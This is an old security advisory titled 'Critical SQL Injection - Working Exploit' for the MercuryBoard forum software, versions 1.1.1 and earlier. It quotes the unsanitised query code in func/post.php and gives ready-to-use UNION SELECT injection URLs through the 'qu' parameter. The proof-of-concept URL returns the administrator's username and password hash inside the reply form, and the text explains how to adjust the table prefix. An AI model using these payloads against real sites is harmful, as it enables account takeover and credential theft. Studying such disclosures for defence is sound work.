{==============================================================================} { [ Zeelock-2005 ] } {==============================================================================} { } { M E C U R Y B O A R D } { } { [ Critical SQL Injection - Working Exploit ] } { } { } {==============================================================================} Date: 7th February 2005 Version Vulnerable: <= 1.1.1 Version Fixed: 1.1.2 "Validate anything can be passed. Security lays in the inputs. " - zk Description ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services. Now just over two years in the making, version 1.0.0 is an immensely stable, thoroughly tested, and well written piece of internet software ready for any webserver, running on PHP versions as low as 4.0.0 and MySQL versions as low as 3.22. For More information: http://www.mercuryboard.com/index.php?a=about Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Andrea Trivero of Codebug Security (www.codebug.org) found a lot of security flaws inside this code: many XSS and some Sql injection. Anyway he did not provide a real working exploit. Looking at the following piece of code in func/post.php we can see that when the "qu" variable is passed along with the "reply" switch we can inject anything inside the "t" parameter passed via GET from the browser because it is not sanitized at all. --------[ Mercury 1.1.1 original code ]-------------- if (($s == 'reply') && isset($this->get['qu'])) { $query = $this->db->fetch("SELECT p.post_text, m.user_name FROM { $this->pre}posts p, {$this->pre}users m WHERE p.post_id={ $this->get['qu']} AND p.post_author=m.user_id"); --------[/Mercury 1.1.1 original code ]-------------- Now we can try to inject something: http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION %20SELECT%20null,null/* The only thing we have to keep in mind is that "t" parameter should refer to a "opic we have the permission to reply and the "qu" parameter should refer to a non existing topic. We get no errors so we can make something more. Proof of concept ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION %20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20 =%201%20limit%201/* The nice thing is that you should see the Admin Username and the Admin Pwd Hash inside the reply form between the [quote] tags. Note: During the installation you may have chosen a different prefix for the tables. You need to modify the query in the right way to retrieve the information from the database.